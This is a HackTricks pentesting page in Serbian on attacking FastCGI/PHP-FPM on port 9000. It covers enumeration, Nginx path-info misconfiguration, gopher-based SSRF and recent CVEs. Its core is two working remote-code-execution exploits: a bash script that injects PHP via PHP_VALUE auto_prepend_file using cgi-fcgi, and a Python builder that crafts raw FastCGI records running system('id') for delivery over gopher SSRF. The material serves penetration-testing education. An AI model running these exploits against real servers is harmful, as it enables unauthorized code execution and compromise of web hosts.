9000 Pentesting FastCGI

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Osnovne informacije

Ako želite da saznate šta je FastCGI, pogledajte sledeću stranicu:

disable_functions bypass - php-fpm/FastCGI

Po defaultu FastCGI radi na portu 9000 i nije prepoznat od strane nmap-a. Obično FastCGI sluša samo na localhost.

Enumeracija / Brze provere

  • Skeniranje porta: nmap -sV -p9000 <target> (će često prikazati “unknown” service; testirajte ručno).
  • Proveri FPM status stranicu: SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000 (podrazumevano php-fpm pm.status_path).
  • Pronađi dostupne sokete putem SSRF: ako je HTTP servis eksploatabilan za SSRF, probajte gopher://127.0.0.1:9000/_... payloads da pogodite FastCGI listener.
  • Nginx pogrešne konfiguracije: ako je cgi.fix_pathinfo=1 uz greške u fastcgi_split_path_info, možete dodati /.php na statičke fajlove i doći do PHP-a (izvršenje koda putem traversal-a).

RCE

Prilično je lako naterati FastCGI da izvrši proizvoljan kod:

Pošaljite FastCGI request koji prethodno dodaje PHP payload ```bash #!/bin/bash

PAYLOAD=“<?php echo ‘’;” FILENAMES=“/var/www/public/index.php” # Exisiting file path

HOST=$1 B64=$(echo “$PAYLOAD”|base64)

for FN in $FILENAMES; do OUTPUT=$(mktemp) env -i
PHP_VALUE=“allow_url_include=1”$‘\n’“allow_url_fopen=1”$‘\n’“auto_prepend_file=‘data://text/plain;base64,$B64’”
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT done

</details>

ili možete koristiti i sledeći python skript: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)

### SSRF/gopher ka FastCGI (kada port 9000 nije direktno dostupan)

Ako imate kontrolu samo nad **SSRF** primitivom, i dalje možete da pogodite FastCGI koristeći gopher šemu i da sastavite kompletan FastCGI zahtev. Primer graditelja payloada:

<details>
<summary>Sastavi i pošalji gopher FastCGI RCE payload</summary>
```python
import struct, socket
host, port = "127.0.0.1", 9000
params = {
b"REQUEST_METHOD": b"POST",
b"SCRIPT_FILENAME": b"/var/www/html/index.php",
b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1"
}
body = b"<?php system('id'); ?>"

def rec(rec_type, content, req_id=1):
return struct.pack("!BBHHBB", 1, rec_type, req_id, len(content), 0, 0) + content

def enc_params(d):
out = b""
for k, v in d.items():
out += struct.pack("!B", len(k)) + struct.pack("!B", len(v)) + k + v
return out
payload  = rec(4, enc_params(params)) + rec(4, b"")  # FCGI_PARAMS + terminator
payload += rec(5, body)                                # FCGI_STDIN

s = socket.create_connection((host, port))
s.sendall(payload)
print(s.recv(4096))

Konvertujte payload u URL-safe base64/percent-encoding i pošaljite putem gopher://host:9000/_<payload> u vašem SSRF.

Napomene o nedavnim problemima

  • libfcgi <= 2.4.4 integer overflow (2024): specijalno oblikovani nameLen/valueLen u FastCGI rekordima mogu da izazovu overflow na 32‑bitnim buildovima (češće u embedded/IoT), što omogućava heap RCE kada je FastCGI socket dostupan (direktno ili preko SSRF).
  • PHP-FPM log manipulation (CVE-2024-9026): kada je catch_workers_output = yes, napadači koji mogu da šalju FastCGI zahteve mogu da skrate ili ubace do 4 bajta po liniji loga kako bi uklonili indikatore ili zatrovali logove.
  • Classic Nginx + cgi.fix_pathinfo misconfig: još uvek često viđeno; ako se fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; koristi bez provere postojanja fajla, svaki path koji se završava sa .php biće izvršen, što omogućava path traversal ili gadgete tipa source overwrite.

Reference

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks